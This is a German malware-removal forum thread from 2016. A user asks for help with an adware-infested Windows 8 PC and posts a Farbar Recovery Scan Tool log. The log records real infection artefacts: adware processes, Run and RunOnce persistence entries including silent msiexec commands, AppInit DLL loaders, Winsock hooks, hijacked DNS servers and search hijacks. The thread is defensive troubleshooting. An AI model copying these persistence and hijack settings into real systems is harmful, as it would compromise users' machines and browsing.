| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Windows 8.x mit einer großen Auswahl an SchädlingenWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
06.02.2016, 17:04
| #1 |
 |  Windows 8.x mit einer großen Auswahl an Schädlingen Hab von einem Bekannten einen Rechner mit Windows 8 64 Bit bekommen. Laut seiner Aussage kommen immer Meldungen sein Rechner sei nicht sicher. Nach einem ersten Blick auf das Gerät offenbarte sich mir viel Arbeit. Es öffnen sich sofort nach dem Login mehrere Browserfenster (verschiedene Browser). Auf anhieb konnte ich folgende Schädlinge entdecken: * Search the Web * Search Protect * MPC Cleaner Die Browserfenster (besonders IE) vermehren etwa alle 10 Sekunden. Zwecks Entfernung der Schädlinge habe ich noch nichts unternommen. Hier hoffe ich auf eure Hilfe. Leider hab ich nicht die Möglichkeit das System neu aufzusetzen, dies wäre meine bevorzugte Lösung. Gruß Thomas |
|
06.02.2016, 18:15
| #2 |
| /// TB-Ausbilder /// Anleitungs-Guru  | Windows 8.x mit einer großen Auswahl an Schädlingen Mein Name ist Jürgen und ich werde Dir bei Deinem Problem behilflich sein. Zusammen schaffen wir das... 
 Hinweis:Ich kann Dir niemals eine Garantie geben, dass wir alle schädlichen Dateien finden werden. Eine Formatierung ist meist der schnellere und immer der sicherste Weg, aber auch nur bei wirklicher Malware empfehlenswert. Adware & Co. können wir sehr gut entfernen. Solltest Du Dich für eine Bereinigung entscheiden, arbeite solange mit, bis Du mein clean  bekommst.Los geht's: Schritt 1   Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
Lesestoff Posten in CODE-Tags: So gehts... Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert uns massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
__________________ |
|
06.02.2016, 20:41
| #3 |
| | Windows 8.x mit einer großen Auswahl an Schädlingen Hallo Jürgen,
__________________erstmal möcht ich mich für deine Hilfe bedanken. Habe versucht einen Scan mit FRST zu erstellen. Nach wenigen Minuten bleibt FRST stehen und nichts passiert mehr. Wenn ich dann gleich reagiere kann ich den PC immerhin noch herunterfahren. Warte ich länger hängt sich der PC auch gleich noch mit auf. Habe deswegen leider keinen vernünftigen Scan. Bei Versuch 1 wurden beide Files erstellt, bei Versuch 2 nur die FRST. FRST (Versuch 1): Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
durchgeführt von Manz (Administrator) auf HAUS (06-02-2016 18:48:19)
Gestartet von E:\
Geladene Profile: Manz (Verfügbare Profile: Manz & Administrator)
Platform: Windows 8 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 10 (Standard-Browser: "C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe" "%1")
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
(ClaraLabs) C:\Program Files (x86)\Common Files\ClaraUpdater\ClaraUpdater.exe
() C:\Windows\System32\DnsBlockUpdateSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\mcsvchost\McSvHost.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\knsbFC2B.tmpfs
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Dritek System INC.) C:\Windows\RfBtnSvc64.exe
() C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275\snscEFCA.tmp
() C:\Program Files\shopperz010220161759\Lugke.exe
(TU-Funs LIMITED) C:\ProgramData\2WdM2\WdMan.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\hnsv4533.tmp
(Atheros) C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe
() C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275\jnsl20B1.tmp
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\systemcore\mfefire.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
() C:\Users\Manz\AppData\Roaming\Genius\Genius.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Client Connect LTD) C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(Microsoft Corporation) C:\Windows\System32\drvinst.exe
(ult updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\SpaceSondPro_Service.exe
(blaim updater) C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
() C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe
(Acer Incorporated) C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16.4.4206.722_x64__8wekyb3d8bbwe\LiveComm.exe
() C:\Program Files (x86)\McAfee\SiteAdvisor\Download\s41c.u.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\{0FCB7971-C63F-44C0-AF4C-BEC25F78B61E}\saInst.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
() C:\Program Files (x86)\securityutility\securityutility\2.0.0.1\Security Utilityupdt.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\{0FCB7971-C63F-44C0-AF4C-BEC25F78B61E}\mcinst.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Space Sound Pro) C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(zik.mu) C:\Program Files\BubbleSound\3D BubbleSound.exe
() C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
() C:\Users\Manz\AppData\Local\SearchModule\2.8.9.113\DeskBar.exe
() C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(NTI Corporation) C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
(McAfee, Inc.) C:\Program Files\mcafee.com\agent\mcagent.exe
() C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe
() C:\Program Files (x86)\rec_en_77\rec_en_77.exe
(1und1 Mail und Media GmbH) C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe
(Microsoft Corporation) C:\Windows\SysWOW64\sc.exe
() C:\Program Files (x86)\rec_de_184\rec_de_184.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
() C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The BoBrowser Authors) C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe
() C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuEmailOutlookAgent.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(The Chromium Authors) C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(csdi ) C:\Users\Manz\AppData\Local\Temp\XX93ZHF0RJGW\newversion.exe
(Microsoft Corporation) C:\Windows\System32\sc.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
() C:\Users\Manz\AppData\Local\Temp\is-95CCQ.tmp\newversion.tmp
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Professional Cleaning Software) C:\Program Files (x86)\Professional Cleaning Software\ProfessionalCleaningSoftware.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-07-31] ()
HKLM\...\Run: [SpaceSoundPro] => C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe [4203520 2015-08-03] (Space Sound Pro)
HKLM\...\Run: [3D BubbleSound] => C:\Program Files\BubbleSound\3D BubbleSound.exe [14115328 2015-01-09] (zik.mu)
HKLM\...\Run: [Sound+] => C:\Program Files\Sound+\Sound+.exe [3836416 2016-02-03] (Sound+)
HKLM\...\Run: [IDSCPRODUCT] => C:\Program Files (x86)\Max Driver Updater\\idscservice.exe [262656 2016-02-06] (Recommandations)
HKLM-x32\...\Run: [BakupManagerTray] => C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe [533568 2012-08-22] (NTI Corporation)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [1527896 2012-06-22] (McAfee, Inc.)
HKLM-x32\...\Run: [gmsd_de_005010223] => C:\Program Files (x86)\gmsd_de_005010223\gmsd_de_005010223.exe [3971760 2016-01-30] ()
HKLM-x32\...\Run: [rec_en_77] => C:\Program Files (x86)\rec_en_77\rec_en_77.exe [3971288 2016-01-30] ()
HKLM-x32\...\Run: [MailCheck IE Broker] => C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck_Broker.exe [2171456 2015-12-17] (1und1 Mail und Media GmbH)
HKLM-x32\...\Run: [rec_de_184] => C:\Program Files (x86)\rec_de_184\rec_de_184.exe [3972784 2016-01-31] ()
HKLM-x32\...\Run: [gmsd_de_005010228] => C:\Program Files (x86)\gmsd_de_005010228\gmsd_de_005010228.exe [3955888 2016-02-04] ()
HKLM-x32\...\RunOnce: [IOPROTECT] => C:\Program Files (x86)\SpaceSondPro_v53.12776\ioproduct_service.bat [164 2016-02-06] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010223.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010223\upgmsd_de_005010223.exe [3276976 2016-01-30] ()
HKLM-x32\...\RunOnce: [upgmsd_de_005010228.exe] => C:\Users\Manz\AppData\Local\gmsd_de_005010228\upgmsd_de_005010228.exe [3271856 2016-02-04] ()
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-19\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-20\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [SearchModule] => C:\Users\Manz\AppData\Local\SearchModule\dblaunch.exe [391168 2015-12-01] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [Security Utility] => C:\Program Files (x86)\\securityutility\\securityutility\\2.0.0.1\securityutility.exe [290928 2016-01-31] (TODO: <Company name>)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [GoogleChromeAutoLaunch_E043F8592C2AE5BE99DCEC1B75F7941B] => C:\Users\Manz\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-04] (The Chromium Authors)
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [CrashService] => C:\Users\Manz\AppData\Local\BoBrowser\Application\crash_service.exe [328824 2016-01-12] ()
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\...\Run: [BoBrowser] => C:\Users\Manz\AppData\Local\BoBrowser\Application\bobrowser.exe [604784 2016-01-12] (The BoBrowser Authors)
HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll [249104 2016-01-14] (Client Connect LTD)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei
AppInit_DLLs-x32: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll => C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll [221456 2016-01-14] (Client Connect LTD)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => Keine Datei
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2012-09-11]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
GroupPolicy: Beschränkung - Chrome <======= ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Winsock: Catalog9 01 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 02 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 03 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 04 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9 16 C:\WINDOWS\SysWOW64\LavasoftTcpService.dll [345360 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\WINDOWS\system32\LavasoftTcpService64.dll [425744 2016-01-31] (Lavasoft Limited)
Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{0384D9E4-6354-47BD-B63F-154E6D937972}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{32DA37AE-A04D-4044-B015-2EB1CB8AE9E5}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{96CC4FD2-7AB2-4A4F-B6CB-52F22B8E3A50}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{97e1de57-d6fa-11e1-be62-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{A10F49CF-5495-47E9-9E07-DCA82E339E8D}: [DhcpNameServer] 150.200.3.1
Tcpip\..\Interfaces\{C02CAB3E-C922-4371-A1DD-E72CF76EF979}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{FF696C85-800A-4636-AE7A-2631D28B75AD}: [NameServer] 104.197.191.4
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer13.msn.com
HKU\S-1-5-21-2229505580-413648313-3343944023-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
SearchScopes: HKLM -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKLM -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> DefaultScope {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3321538&octid=EB_ORIGINAL_CTID&ISID=MDEC25DAF-A6CE-4B57-9019-93B3CF2948FC&SearchSource=58&CUI=&UM=8&UP=SPF3E97A65-0079-42ED-94F3-4AC0FA91C53A&D=020616&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {140E657E-89B5-411B-951A-24698B1E79EF} URL = hxxp://www.palikan.com/results.php?f=4&a=bfp_cmi_16_04&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtA0AtD0BtByByDyC0BtBzytN0D0Tzu0StCyEzytCtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtBtN1L1G1B1V1N2Y1L1Qzu2SyEzyzytC0BzzzzyEtGtC0Ezy0AtG0EyDyC0BtGyBtCyDtAtGyEzy0CyDtB0A0D0E0C0A0EtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyB0FyE0A0ByEtCyBtGtDzy0A0AtGyE0ByBzytG0AtDtCyEtGyC0D0CtC0C0BtD0ByDyDzz0D2QtN0A0LzuyE&cr=512840388&ir=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {2DEFAF55-1981-4273-B141-DFD5ACCEBCB2} URL = hxxp://go.1und1.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {31E15B1A-A8DD-4EE8-B691-0B5EF63443F3} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G26zftpbl2,d5d1e8af-1fcd-4d24-99e0-065c0a95ed60,
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {41A2183B-D46F-4ACB-9F07-A0F2C3313AE2} URL = hxxp://go.mail.com/tb/en-us/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {6586d803-df30-46d3-a89a-4136c8571d45} URL = hxxp://go.gmx.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B0EC8E09-9A12-42A0-8972-CB73908A487E} URL = hxxp://go.web.de/tb/ie_searchplugin/?q={searchTerms}&enc=UTF-8
SearchScopes: HKU\S-1-5-21-2229505580-413648313-3343944023-1002 -> {B1AEE09D-45BC-480C-A2DF-7253EBC7E1F2} URL =
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-07-31] (Qualcomm Atheros Commnucations)
BHO: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}\{11CC1EA7-DE06-4178-903D-9C256E6195CA}.bin [2016-02-06] (Download Protect)
BHO: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee64.dll [2016-02-01] ()
BHO-x32: FunFeedr -> {11B16A3D-F03E-4565-A532-E66B219C9B03} -> C:\Users\Manz\AppData\Local\ext_funfeedr\ext_funfeedr.dll [2015-03-30] ()
BHO-x32: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO-x32: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}\{095874F7-4128-4F5C-9B3B-E328061719C1}.bin [2016-02-06] (Download Protect)
BHO-x32: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee.dll [2016-02-01] ()
Toolbar: HKLM - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Toolbar: HKLM-x32 - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler-x32: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2012-05-14] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2012-05-14] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: chrome://quick_start/content/index.html
FF DefaultSearchEngine: yessearches
